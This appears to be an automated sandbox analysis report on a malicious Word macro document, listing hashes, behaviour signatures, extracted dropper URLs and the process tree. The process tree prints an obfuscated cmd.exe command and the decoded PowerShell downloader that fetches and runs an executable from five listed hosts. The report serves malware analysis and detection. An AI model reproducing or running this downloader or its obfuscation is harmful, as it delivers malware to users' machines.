Analysis
-
max time kernel
145s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
08-05-2024 23:18
General
-
Target
272e0e5c87d69d7364ca78801a375538_JaffaCakes118.doc
-
Size
91KB
-
MD5
272e0e5c87d69d7364ca78801a375538
-
SHA1
1ee6c2690e27bba3f0ea1fcf87bada2962f12867
-
SHA256
555d2c8d15d1d8018a56c964ae88148ebffcf5a323d9a1a0c04897a208180692
-
SHA512
fce0640b38c95b25df64ba9d40565d1cbf65fd25b8df74d995cc67fbecee93820cd460210400489f31d228091cdfbc0dcfa6b8d3132e71aff7b0c67d76abff6d
-
SSDEEP
1536:07ljmW9/bvF8kDK3cvyQa2E1XFjmCaIH84G+a9:Wl/bvF8OnaJ1XtxaIH84
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://www.ozturcanakkale.com/veh
exe.dropper
http://jalvarshaborewell.com/qKkg
exe.dropper
http://kikakeus.nl/dgc0WYq9
exe.dropper
http://pashkinbar.ru/cWGU
exe.dropper
http://cisteni-studni.com/qb1Y2
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 6 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\272e0e5c87d69d7364ca78801a375538_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set KMg=JFCiSsmEtbJWtDAbWLcuqRKwifdqXjZOT=)B9Mz8H{Ie1}-v.lxyU\'rY:g (20$,@6;+akGhNop/n&&for %u in (63;30;74;70;33;54;26;29;49;54;67;63;37;75;5;33;77;43;23;46;74;15;29;43;18;12;59;73;43;12;48;16;43;15;2;49;24;43;77;12;67;63;4;77;29;33;54;72;12;12;75;57;76;76;23;23;23;48;74;38;12;19;55;18;69;77;69;70;70;69;49;43;48;18;74;6;76;47;43;72;65;72;12;12;75;57;76;76;29;69;49;47;69;55;5;72;69;15;74;55;43;23;43;49;49;48;18;74;6;76;27;22;70;58;65;72;12;12;75;57;76;76;70;24;70;69;70;43;19;5;48;77;49;76;26;58;18;62;16;56;27;36;65;72;12;12;75;57;76;76;75;69;5;72;70;24;77;15;69;55;48;55;19;76;18;16;71;52;65;72;12;12;75;57;76;76;18;24;5;12;43;77;24;46;5;12;19;26;77;24;48;18;74;6;76;27;15;44;56;61;54;48;4;75;49;24;12;60;54;65;54;34;67;63;49;69;12;33;54;1;24;10;54;67;63;70;73;72;59;33;59;54;61;36;66;54;67;63;21;37;32;33;54;70;40;23;54;67;63;5;25;47;33;63;43;77;47;57;12;43;6;75;68;54;53;54;68;63;70;73;72;68;54;48;43;50;43;54;67;25;74;55;43;69;18;72;60;63;26;23;23;59;24;77;59;63;4;77;29;34;41;12;55;51;41;63;37;75;5;48;13;74;23;77;49;74;69;26;1;24;49;43;60;63;26;23;23;64;59;63;5;25;47;34;67;63;17;70;31;33;54;24;19;16;54;67;42;25;59;60;60;71;43;12;46;42;12;43;6;59;63;5;25;47;34;48;49;43;77;58;12;72;59;46;58;43;59;39;62;62;62;62;34;59;41;42;77;47;74;70;43;46;42;12;43;6;59;63;5;25;47;67;63;32;70;28;33;54;73;31;24;54;67;15;55;43;69;70;67;45;45;18;69;12;18;72;41;45;45;63;6;23;13;33;54;38;35;73;54;67;79)do set LqCa=!LqCa!!KMg:~%u,1!&&if %u gtr 78 powershell "!LqCa:~-440!""2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeCmD /V:/C"set KMg=JFCiSsmEtbJWtDAbWLcuqRKwifdqXjZOT=)B9Mz8H{Ie1}-v.lxyU\'rY:g (20$,@6;+akGhNop/n&&for %u in (63;30;74;70;33;54;26;29;49;54;67;63;37;75;5;33;77;43;23;46;74;15;29;43;18;12;59;73;43;12;48;16;43;15;2;49;24;43;77;12;67;63;4;77;29;33;54;72;12;12;75;57;76;76;23;23;23;48;74;38;12;19;55;18;69;77;69;70;70;69;49;43;48;18;74;6;76;47;43;72;65;72;12;12;75;57;76;76;29;69;49;47;69;55;5;72;69;15;74;55;43;23;43;49;49;48;18;74;6;76;27;22;70;58;65;72;12;12;75;57;76;76;70;24;70;69;70;43;19;5;48;77;49;76;26;58;18;62;16;56;27;36;65;72;12;12;75;57;76;76;75;69;5;72;70;24;77;15;69;55;48;55;19;76;18;16;71;52;65;72;12;12;75;57;76;76;18;24;5;12;43;77;24;46;5;12;19;26;77;24;48;18;74;6;76;27;15;44;56;61;54;48;4;75;49;24;12;60;54;65;54;34;67;63;49;69;12;33;54;1;24;10;54;67;63;70;73;72;59;33;59;54;61;36;66;54;67;63;21;37;32;33;54;70;40;23;54;67;63;5;25;47;33;63;43;77;47;57;12;43;6;75;68;54;53;54;68;63;70;73;72;68;54;48;43;50;43;54;67;25;74;55;43;69;18;72;60;63;26;23;23;59;24;77;59;63;4;77;29;34;41;12;55;51;41;63;37;75;5;48;13;74;23;77;49;74;69;26;1;24;49;43;60;63;26;23;23;64;59;63;5;25;47;34;67;63;17;70;31;33;54;24;19;16;54;67;42;25;59;60;60;71;43;12;46;42;12;43;6;59;63;5;25;47;34;48;49;43;77;58;12;72;59;46;58;43;59;39;62;62;62;62;34;59;41;42;77;47;74;70;43;46;42;12;43;6;59;63;5;25;47;67;63;32;70;28;33;54;73;31;24;54;67;15;55;43;69;70;67;45;45;18;69;12;18;72;41;45;45;63;6;23;13;33;54;38;35;73;54;67;79)do set LqCa=!LqCa!!KMg:~%u,1!&&if %u gtr 78 powershell "!LqCa:~-440!""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$Zok='djl';$Mps=new-object Net.WebClient;$Snj='http://www.ozturcanakkale.com/veh@http://jalvarshaborewell.com/qKkg@http://kikakeus.nl/dgc0WYq9@http://pashkinbar.ru/cWGU@http://cisteni-studni.com/qb1Y2'.Split('@');$lat='FiJ';$kNh = '296';$RMT='kHw';$sfv=$env:temp+'\'+$kNh+'.exe';foreach($dww in $Snj){try{$Mps.DownloadFile($dww, $sfv);$LkO='iuW';If ((Get-Item $sfv).length -ge 80000) {Invoke-Item $sfv;$TkX='NOi';break;}}catch{}}$mwD='zBN';"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\35334F8A.wmfFilesize
512B
MD556453b0edafbd5e265ed6ecf00d7f6f5
SHA1f5cde9b884a39517ed1684dc881860d30cc50886
SHA25623e8840a423f6ecf7b98aa27e3a1aa1f9b2d7aff98200f2e0fdc954994d0865f
SHA512756cc521a507960484ac94f15671ac0d5843229fbc003b2aeea3b499aa96fc35e540a65737699e01431a3958857da49d7322835cafea9269db0a20eabe05faf2
-
C:\Users\Admin\AppData\Local\Temp\TCD93CF.tmp\sist02.xslFilesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vi1ia4vz.0ph.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/3568-8-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-9-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-16-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-7-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-21-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-2-0x00007FFA485B0000-0x00007FFA485C0000-memory.dmpFilesize
64KB
-
memory/3568-6-0x00007FFA485B0000-0x00007FFA485C0000-memory.dmpFilesize
64KB
-
memory/3568-11-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-12-0x00007FFA45EB0000-0x00007FFA45EC0000-memory.dmpFilesize
64KB
-
memory/3568-10-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-13-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-20-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-15-0x00007FFA45EB0000-0x00007FFA45EC0000-memory.dmpFilesize
64KB
-
memory/3568-17-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-5-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-4-0x00007FFA885CD000-0x00007FFA885CE000-memory.dmpFilesize
4KB
-
memory/3568-14-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-19-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-18-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-3-0x00007FFA485B0000-0x00007FFA485C0000-memory.dmpFilesize
64KB
-
memory/3568-581-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-0-0x00007FFA485B0000-0x00007FFA485C0000-memory.dmpFilesize
64KB
-
memory/3568-1-0x00007FFA485B0000-0x00007FFA485C0000-memory.dmpFilesize
64KB
-
memory/3568-550-0x00007FFA88530000-0x00007FFA88725000-memory.dmpFilesize
2.0MB
-
memory/3568-578-0x00007FFA485B0000-0x00007FFA485C0000-memory.dmpFilesize
64KB
-
memory/3568-579-0x00007FFA485B0000-0x00007FFA485C0000-memory.dmpFilesize
64KB
-
memory/3568-580-0x00007FFA485B0000-0x00007FFA485C0000-memory.dmpFilesize
64KB
-
memory/3568-577-0x00007FFA485B0000-0x00007FFA485C0000-memory.dmpFilesize
64KB
-
memory/4876-58-0x0000026F37530000-0x0000026F37552000-memory.dmpFilesize
136KB